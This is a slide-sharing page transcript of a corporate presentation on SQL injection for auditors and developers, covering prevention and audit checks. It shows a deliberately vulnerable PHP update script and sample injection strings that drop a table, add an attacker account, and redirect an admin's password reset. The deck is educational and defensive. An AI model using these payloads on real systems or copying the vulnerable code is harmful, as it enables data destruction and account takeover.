UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBX
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptx
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdf
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 

Injection techniques conversys

  • 2. What is an Injection Attack? • Exploits weak application level security around the “system” type ID • Exploit allows the client, a.k.a. attacker, to “piggyback” code into a web page, and have the “system” ID execute it for them • Can both execute commands and insert / update / delete data Conversys Technologies PVT. Ltd.
  • 3. What is the Danger? • Typically “system” IDs have “all access” rights to the database • When exploited, the attacker can do anything the “system” ID can • Utilizes no special equipment or advanced knowledge Conversys Technologies PVT. Ltd.
  • 4. Industry Joint study by the US department of Commerce and Visa Ranked as one of the top 5 greatest data security vulnerabilities “SQL injection is a technique used to exploit Web-based applications by using client-supplied data in SQL queries. SQL injection attacks are caused primarily by applications that lack input validation checks. Recently, commercial shopping cart products have been the focus of attack by hackers who seek account information. PCI DSS Requirement 6.5 requires that Web-facing applications be developed in accordance with secure coding guidelines to guard against such attacks. “ Conversys Technologies PVT. Ltd.
  • 5. Different Types of Code Injection • SQL Injection (Most prevalent) • LDAP Injection • XML Injection • Others...... * Flaw is not code specific, rather in the web application it is embedded in Conversys Technologies PVT. Ltd.
  • 6. Structure of Web Based Systems • Application logic– Typically built with a scripting language (php, jsp, asp), a lightweight tool that interfaces with the data source and controls the behavior of the program • Data Source – Typically a database, but could also be a flat file, XML file, or another application • The interface between the application and data source is typically done with an embedded language. Embedded systems integrate one type of code into another (such as a php script executing SQL commands) Conversys Technologies PVT. Ltd.
  • 7. How does it work? Review on Client-Server Architecture You (client) request a web page Server responds with the page, as displayed on the client computer Client enters data Server takes data, runs server side script, queries database, returns results Conversys Technologies PVT. Ltd.
  • 8. What really happens when you search? Server has a prewritten SQL query stored in a script select item, picture, from ItemDB where description = ‘$client_input’; You input “american psycho 1st” Prewritten script is then executed by “system” as : select item, picture, from ItemDB where description = “american psycho 1st”; Please Note: You just used the “system” ID to execute a query that YOU wrote. In practice, most “system” ID’s have DBA level access, and are only restricted by the logic built into the application itself. Conversys Technologies PVT. Ltd.
  • 9. Code Example <?PHP session_start(); header("Cache-control: private"); // IE 6 Fix. error_reporting(E_ALL); ?> <html> <body bgcolor = white> <?php $email = $_SESSION['email']; // Variable holding user’s email address $value = stripslashes($_POST['newdata']); // Variable holding data entered $fieldname = $_POST['type']; // Variable holding fieldname to update if ($_SESSION['access_rights'] == 1) { $db = mysql_connect("localhost", "system_id", “password"); // Connects to local DB mysql_select_db("payroll",$db); // selects database to query $query = "update data SET $fieldname='$value' WHERE email = '$email'"; // Prewritten Query $result = mysql_query($query,$db); // executes query echo "<META HTTP-EQUIV='Refresh' CONTENT='0; URL=return.php'>"; } ?> Conversys Technologies PVT. Ltd.
  • 10. How can we exploit this? SQL Query Stored in Application: select item, picture, from ItemDB where description = ‘$client_input’ To commit a SQL Injection Attack, enter into the web site form: x‘;drop table ‘ItemDB The query executed by the “System” ID will now be: select item, picture, from ItemDB where description = ‘x‘;drop table ‘ItemDB’ The server just executed the stored query, and we just effectively destroyed the entire “ItemDB” database! Conversys Technologies PVT. Ltd.
  • 11. Even More Fun… “Add A New User” Canned Query: SELECT email, passwd, login_id, full_name FROM members WHERE email = ‘$user_input’; SQL Attack: x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name') VALUES (‘mike@pinch.com',‘mynewPW',‘pinch',‘Mike Pinch') System then Executes: SELECT email, passwd, login_id, full_name FROM members WHERE email = ‘x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name') VALUES (‘mike@pinch.com',‘mynewPW',‘pinch',‘Mike Pinch'); I now have my very own account! Conversys Technologies PVT. Ltd.
  • 12. One More for Good Measure “Forgot my Password” Canned Query: SELECT email, passwd, login_id, full_name FROM members WHERE email = ‘$UserInput’; SQL Attack: x'; UPDATE members SET email = ‘pinch@CLIENTX.com' WHERE email = ‘sysadmin@CLIENTX.com System then Executes: SELECT email, passwd, login_id, full_name FROM members WHERE email = x'; UPDATE members SET email = ‘pinch@CLIENTX.com' WHERE email = ‘sysadmin@CLIENTX.com Now just go to forgot my password, type pinch@CLIENTX.com, and the system will conveniently email me the system admin’s password! Conversys Technologies PVT. Ltd.
  • 14. Error Message Masking • Bad • Good Conversys Technologies PVT. Ltd.
  • 15. Error Masking • Blocks real error messages from being displayed to the client • Best Practice All specific errors messages are suppressed, either through using a generic error message, or blocking them altogether. Conversys Technologies PVT. Ltd.
  • 16. How are Attacks Prevented? Sanitize all input including: • Data collected in Forms through browsers • Data collected in URL’s • Data collected through cookies • White/Black List • Mask Error Messages • Continuous Monitoring • New Technique: SQL Firewalls Conversys Technologies PVT. Ltd.
  • 17. Prevalence of Attacks • Injection attacks are extremely powerful, almost always malicious, and nearly undetectable (until its too late) • Danger comes from simplicity – no special hardware or software is necessary. Just syntax knowledge and a browser! • In 2006, 14% of newly released commercial application and open source tools were vulnerable to SQL injection attacks. • A recent study of web sites not masking error messages returned a total of 10.3% Conversys Technologies PVT. Ltd.
  • 18. Integrating into the Audit • Weak controls related to • Cobit Framework preventing injection attacks may – DS 5.3, Identity Management require nature, timing and extent • “All users (internal, external and temporary) of financial statement substantive and their activity on IT systems (business audit procedures. application, system operation, development and maintenance) should be uniquely identifiable. User access rights to systems and data should be in line with defined and • Assistance may be needed from documented business needs and job systems or data management requirements. User access rights are professionals to help identify if requested by user management, approved there were instances in which the by system owner and implemented by the control weaknesses were security-responsible person. User identities and access rights are maintained in a exploited. central repository. Cost-effective technical and procedural measures are deployed and kept current to establish • Cobit Framework (See excerpt) user identification, implement – DS 5.3, Identity Management authentication and enforce access rights.” Conversys Technologies PVT. Ltd.
  • 19. What Systems are Vulnerable? • Predominantly internally developed applications • Web based client-server architecture • Any system where access is available via the web Conversys Technologies PVT. Ltd.
  • 20. How do you determine if a system is vulnerable? • Inquire – Do you have database and server error messages masked? – Do you have a strategy to sanitize all user input to detect SQL injection attacks? – Walk me through how your system prevents SQL injection attempts, IE filtering input, limiting rights. • Observe – Ask client to generate an error message • Should either be generic or non-existent • Inspect – Request code sample showing filtering module logic • Should filter out suspicious characters such as “’,/;&%$” etc • View White/Black List • Attack and Penetration Testing Conversys Technologies PVT. Ltd.
  • 21. Created and Presented by Krishnendu Paul Vice President – Technologies Conversys Technologies Pvt. Ltd. A Maxelor Company References http://www.sarbanes-oxley.com/section.php?level=1&pub_id=Sarbanes-Oxley http://usa.visa.com/download/business/accepting_visa/ops_risk_management/Top_5_Vulnerabilities _Bulletin_August2006.pdf - 2006 Visa USA "Applying an improved economic model to software buy-versus-build decisions", Higaki,Wesley. Hewlett-Packard Journal, August 1995. "Cobit 4.0", IT Governance Institute, 2005 Mitre Corporation, 2006 Conversys Technologies PVT. Ltd.
  • 22. Thanks Conversys Technologies Pvt. Ltd. • Kolkata Office : 7, Bondel Road, Kolkata, West Bengal India – 700019 E-mail: info@conversys.in Telephone: +91-33-64602675 • Pune Office: #204, Casa Grande, Lane No. 8. Koregaon Park, Pune - 411 001 Telephone: +91 20 26052014 • US Office: 15 Corporate Place, Suite# 333 Piscataway, , NJ, 08854 USA Conversys Technologies PVT. Ltd.